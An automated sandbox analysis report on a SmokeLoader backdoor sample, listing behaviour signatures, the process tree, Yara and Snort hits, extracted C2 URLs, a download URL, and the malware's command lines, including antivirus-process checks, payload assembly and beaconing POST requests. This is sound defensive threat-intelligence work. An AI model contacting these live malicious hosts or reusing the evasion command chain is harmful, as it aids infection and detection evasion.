
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1435516
MD5: 0c4cb8fd1e3cc4b42556562d317e6e59
SHA1: 8a572e6ef21e54b76cf0b38099c6ca47d607170e
SHA256: e787e9b3eb07676a4848cb9ff1dad9a19a5b3aa11a220b2ba3d447ac6680abeb
Tags: exe
Infos:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Found API chain indicative of debugger detection
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0C4CB8FD1E3CC4B42556562D317E6E59)
    • cmd.exe (PID: 7548 cmdline: "C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7600 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7608 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7644 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7652 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7688 cmdline: cmd /c md 1151 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7704 cmdline: findstr /V "decentrisingadvertisementssuite" Appliance MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7720 cmdline: cmd /c copy /b Annually + Protective 1151\b MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Existence.pif (PID: 7736 cmdline: 1151\Existence.pif 1151\b MD5: 62D09F076E6E0240548C2F837536A46A)
        • Existence.pif (PID: 280 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif MD5: 62D09F076E6E0240548C2F837536A46A)
          • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • PING.EXE (PID: 7768 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • ssjhrji (PID: 7668 cmdline: C:\Users\user\AppData\Roaming\ssjhrji MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body. | SMOKY SPIDER | (none listed) | https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}
Source | Rule | Description | Author | Strings
00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |

        System Summary

        Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: 1151\Existence.pif 1151\b, CommandLine: 1151\Existence.pif 1151\b, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7548, ParentProcessName: cmd.exe, ProcessCommandLine: 1151\Existence.pif 1151\b, ProcessId: 7736, ProcessName: Existence.pif

        HIPS / PFW / Operating System Protection Evasion

        Source: Process started | Author: Joe Security | Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7548, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 7652, ProcessName: findstr.exe
        Snort IDS alerts (all SID 2039103, TCP, destination port 80, classtype "A Network Trojan was detected"):

        Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
        05/02/24-20:49:25.562996 | 2039103 | 49744 | 80 | TCP | A Network Trojan was detected
        05/02/24-20:49:29.611454 | 2039103 | 49747 | 80 | TCP | A Network Trojan was detected
        05/02/24-20:49:38.222924 | 2039103 | 49754 | 80 | TCP | A Network Trojan was detected
        05/02/24-20:49:33.652088 | 2039103 | 49750 | 80 | TCP | A Network Trojan was detected
        05/02/24-20:49:35.713703 | 2039103 | 49752 | 80 | TCP | A Network Trojan was detected
        05/02/24-20:49:30.529068 | 2039103 | 49748 | 80 | TCP | A Network Trojan was detected
        05/02/24-20:49:26.484537 | 2039103 | 49745 | 80 | TCP | A Network Trojan was detected
        05/02/24-20:49:27.548348 | 2039103 | 49746 | 80 | TCP | A Network Trojan was detected
        05/02/24-20:49:31.455151 | 2039103 | 49749 | 80 | TCP | A Network Trojan was detected
        05/02/24-20:49:39.138361 | 2039103 | 49755 | 80 | TCP | A Network Trojan was detected
        05/02/24-20:49:34.799212 | 2039103 | 49751 | 80 | TCP | A Network Trojan was detected
        05/02/24-20:49:37.305666 | 2039103 | 49753 | 80 | TCP | A Network Trojan was detected

        AV Detection

        Source: https://2no.co/16G965u | Avira URL Cloud: Label: malware
        Source: https://2no.co/16G965Z | Avira URL Cloud: Label: malware
        Source: https://2no.co/ | Avira URL Cloud: Label: malware
        Source: http://piratia.su/tmp/index.php | Avira URL Cloud: Label: malware
        Source: http://h-c-v.ru/tmp/index.php | Avira URL Cloud: Label: malware
        Source: https://2no.co/16G965 | Avira URL Cloud: Label: malware
        Source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}
        Source: file.exe | ReversingLabs: Detection: 18%
        Source: file.exe | Joe Sandbox ML: detected
        Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown | HTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_0079E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_0079E472
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_0079DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0079DC54
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_007AA087
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_007AA1E2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_007AA570
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_0076C622 FindFirstFileExW,10_2_0076C622
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007A66DC FindFirstFileW,FindNextFileW,FindClose,10_2_007A66DC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007A7333 FindFirstFileW,FindClose,10_2_007A7333
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_007A73D4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_0079D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0079D921
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_007AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_007AA087
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_007AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_007AA1E2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_0079E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_0079E472
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_007AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_007AA570
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_0076C622 FindFirstFileExW,16_2_0076C622
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_007A66DC FindFirstFileW,FindNextFileW,FindClose,16_2_007A66DC
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_007A7333 FindFirstFileW,FindClose,16_2_007A7333
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_007A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_007A73D4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_0079D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_0079D921
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_0079DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_0079DC54
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B4A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00B4A087
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B4A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00B4A1E2
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B3E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00B3E472
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B4A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00B4A570
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B466DC FindFirstFileW,FindNextFileW,FindClose,19_2_00B466DC
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00B473D4
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B47333 FindFirstFileW,FindClose,19_2_00B47333
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B3D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00B3D921
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B3DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00B3DC54
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
        Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

        Networking

        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49744 -> 186.10.34.243:80
        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49745 -> 186.10.34.243:80
        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49746 -> 186.10.34.243:80
        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49747 -> 186.10.34.243:80
        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 186.10.34.243:80
        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49749 -> 186.10.34.243:80
        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49750 -> 186.10.34.243:80
        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49751 -> 186.10.34.243:80
        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49752 -> 186.10.34.243:80
        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49753 -> 186.10.34.243:80
        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49754 -> 186.10.34.243:80
        Source: Traffic | Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49755 -> 186.10.34.243:80
        Source: C:\Windows\explorer.exe | Network Connect: 186.10.34.243 80
        Source: Malware configuration extractor | URLs: http://cellc.org/tmp/index.php
        Source: Malware configuration extractor | URLs: http://h-c-v.ru/tmp/index.php
        Source: Malware configuration extractor | URLs: http://icebrasilpr.com/tmp/index.php
        Source: Malware configuration extractor | URLs: http://piratia-life.ru/tmp/index.php
        Source: Malware configuration extractor | URLs: http://piratia.su/tmp/index.php
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
        Source: Joe Sandbox View | IP Address: 104.21.79.229 104.21.79.229
        Source: Joe Sandbox View | ASN Name: ENTELCHILESACL ENTELCHILESACL
        Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ynwsxoervaie.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 198 | Host: cellc.org
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://khjhprifrxebx.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 113 | Host: cellc.org
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yyyjoidqibgvbs.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 254 | Host: cellc.org
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jyvmasmiydvgjuu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 117 | Host: cellc.org
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qkoxdyhgicus.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 176 | Host: cellc.org
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wsacracxaao.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 235 | Host: cellc.org
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dhdnvpjjjnb.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 125 | Host: cellc.org
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hberlqlxvspxm.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 314 | Host: cellc.org
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ndsmsdugaunva.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 260 | Host: cellc.org
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kxgtxppvhlmsi.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 311 | Host: cellc.org
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dgqkmisxnbbni.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 138 | Host: cellc.org
        Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uwgftqaxwugurgs.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 165 | Host: cellc.org
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007AD95F InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,10_2_007AD95F
        Source: global traffic | HTTP traffic detected: GET /16G965 HTTP/1.1 | User-Agent: Walk | Host: 2no.co
        Source: global traffic | DNS traffic detected: DNS query: 2no.co
        Source: global traffic | DNS traffic detected: DNS query: rgcVXPIqSMzHmoPyVwzhcGh.rgcVXPIqSMzHmoPyVwzhcGh
        Source: global traffic | DNS traffic detected: DNS query: cellc.org
        Source: unknown | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ynwsxoervaie.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 198 | Host: cellc.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 04 00 00 00 72 e8 85 ed Data Ascii: r
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
